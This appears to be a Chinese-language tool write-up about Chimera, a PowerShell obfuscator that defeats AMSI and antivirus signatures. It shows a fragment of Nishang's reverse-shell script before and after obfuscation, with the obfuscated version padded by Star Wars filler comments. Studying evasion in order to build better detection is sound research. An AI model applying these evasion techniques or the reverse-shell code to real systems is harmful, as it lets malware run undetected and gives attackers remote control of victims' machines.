本文插图
ChimeraChimera是一款针对PowerShell脚本代码的混淆工具 ， 广大研究人员可以利用Chimera来对自己的PowerShell脚本代码进行混淆处理 ， 并绕过目标设备的AMIS和其他反病毒解决方案 。 该工具可以通过字符串替换和变量连接来规避常见的签名检测 ， 并让恶意的PowerShell脚本无法触发AV检测 。
Chimera的主要目标是帮助大家更好地实现反病毒产品的恶意脚本绕过 ， 它也进一步证明了绕过AV检测其实是非常简单的一件事情 ， 希望Chimera能够激发社区中的各位研究人员去构建出更加健壮可靠的东西 。
Chimera运行机制下面给出的的是Nishang的Invoke-PowerShellTcp.ps1脚本的代码段 ， VirusTotal的检测结果如下：
$stream = $client.GetStream[byte]$bytes = 0..65535|%{0}#Send back current username and computername$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")$stream.Write($sendbytes,0,$sendbytes.Length)#Show an interactive PowerShell prompt$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')

本文插图
接下来 ， 经过Chimera的处理之后 ， VirusTotal针对该脚本的混淆版本的检测结果如下：
# Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"# As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.[bYte]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}# Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.# Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.# Heeding Ben’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim.# Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)# An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.